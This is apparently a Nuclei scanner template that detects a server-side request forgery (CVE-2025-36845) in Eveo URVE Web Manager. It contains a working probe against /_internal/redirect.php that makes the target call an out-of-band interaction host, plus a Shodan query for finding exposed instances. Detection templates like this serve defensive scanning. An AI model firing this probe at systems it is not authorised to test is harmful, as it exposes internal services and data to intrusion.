id: CVE-2025-36845

info:
  name: Eveo URVE Web Manager - Server-Side Request Forgery
  author: DhiyaneshDk
  severity: high
  description: |
    Eveo URVE Web Manager 27.02.2025 contains a server-side request forgery caused by improper validation of URL input in /_internal/redirect.php, letting attackers make requests to internal endpoints, exploit requires crafted URL input.
  impact: |
    Attackers can make requests to internal-only accessible endpoints, potentially exposing sensitive internal services or data.
  remediation: |
    Update to the latest version with SSRF protections or apply input validation to restrict URL requests.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-035.txt
    - https://smartoffice.expert/en
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"URVE Web Manager"
  tags: cve,cve2025,eveo,ssrf,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/urve/site/login.html?lang=en"

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'URVE Web Manager')"
          - "status_code == 200"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/_internal/redirect.php?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100e8485b0f6e12dfd30ac43130dd20d7059168912b2c8db99550e2d11f32affcfa022100e6d23f89bb6bd11e0a804607ad7b8e2f0048044b1edd544ad3bdc8b9b3311ace:922c64590222798bb761d5b6d8e72950